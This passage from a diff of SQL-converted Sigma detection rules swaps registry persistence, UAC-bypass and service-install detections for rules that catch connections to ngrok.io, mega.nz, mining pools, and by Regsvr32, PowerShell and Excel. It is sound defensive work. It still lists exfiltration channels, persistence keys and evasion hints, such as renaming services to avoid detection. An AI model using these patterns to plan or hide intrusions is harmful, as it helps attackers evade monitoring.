ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR 
DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_dllhost_net_connections.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "CurrentVersion Autorun Keys Modification", - "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", + "status": 
"test", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate use of mega.nz uploaders and tools" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE 
'\\' OR TargetObject LIKE '%\\\\Authentication\\\\PLAP Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Provider Filters%' ESCAPE '\\')) AND NOT ((Details = '(Empty)' OR TargetObject LIKE '%\\\\NgcFirst\\\\ConsecutiveSwitchCount' ESCAPE '\\' OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\devicecensus.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\winsat.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\Update\\\\OneDriveSetup.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\KeePass Password Safe 2\\\\ShInstUtil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Everything\\\\Everything.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\LogonUI.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{D6886603-9D2F-4EB2-B667-1971041FA96B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{BEC09223-B018-416D-A0AC-523971B639F5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Authentication\\\\Credential Providers\\\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files 
(x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\regsvr32.exe' ESCAPE '\\' AND TargetObject LIKE '%DropboxExt%' ESCAPE '\\' AND Details LIKE '%A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Opera Browser Assistant' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Opera\\\\assistant\\\\browser\\_assistant.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\iTunesHelper' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\iTunes\\\\iTunesHelper.exe\"' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\zoommsirepair' ESCAPE '\\' AND Details LIKE '\"C:\\\\Program Files\\\\Zoom\\\\bin\\\\installer.exe\" /repair' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Greenshot' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Greenshot\\\\Greenshot.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\GoogleDriveFS' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\GoogleDriveFS.exe%' ESCAPE '\\') OR (TargetObject LIKE '%GoogleDrive%' ESCAPE '\\' AND Details IN ('{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}', '{A8E52322-8734-481D-A7E2-27B309EF8D56}', '{C973DA94-CBDF-4E77-81D1-E5B794FBD146}', '{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c rmdir /s /q \"C:\\\\Users\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\') AND Details LIKE 
'%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Package Cache\\\\{%' ESCAPE '\\' AND Details LIKE '%}\\\\python-%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft\\\\Teams\\\\Update.exe --processStart %' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\userinit.exe' ESCAPE '\\' AND Details = 'ctfmon.exe /n') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\Setup\\\\%' ESCAPE '\\' AND (Details LIKE '\"C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files (x86)\\\\AVG\\\\Antivirus\\\\AvLaunch.exe\" /gui' ESCAPE '\\' OR Details LIKE '{472083B0-C522-11CF-8763-00608CC02F24}' ESCAPE '\\')) OR ((Image LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR Image LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\aurora-dashboard' ESCAPE '\\' AND Details LIKE 'C:\\\\Program Files\\\\Aurora-Agent\\\\tools\\\\aurora-dashboard.exe' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Everything' ESCAPE '\\' AND Details LIKE '%\\\\Everything\\\\Everything.exe\" -startup' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - 
"filename": "registry_set_asep_reg_keys_modification_currentversion.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Suspicious Service Installed", - "id": "f2485272-a156-4773-82d7-1d178bc4905b", - "status": "test", - "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "PowerShell Network Connections", + "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", + "status": "experimental", + "description": "Detects a Powershell process that opens network connections - check 
for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1562.001", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." + "Administrative scripts", + "Microsoft IP range" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" ], - "filename": "registry_set_susp_service_installed.yml" + "filename": "net_connection_win_powershell_network_connection.yml" }, { - "title": "Add Debugger Entry To AeDebug For Persistence", - "id": "092af964-4233-4373-b4ba-d86ea2890288", - "status": "experimental", - "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": 
"stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 
'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 
'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru'))" ], - "filename": "registry_set_aedebug_persistence.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "CrashControl CrashDump Disabled", - "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.t1564", - "attack.t1112" + "attack.execution", + "attack.t1203" ], 
"falsepositives": [ - "Legitimate disabling of crashdumps" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_crashdump_disabled.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": 
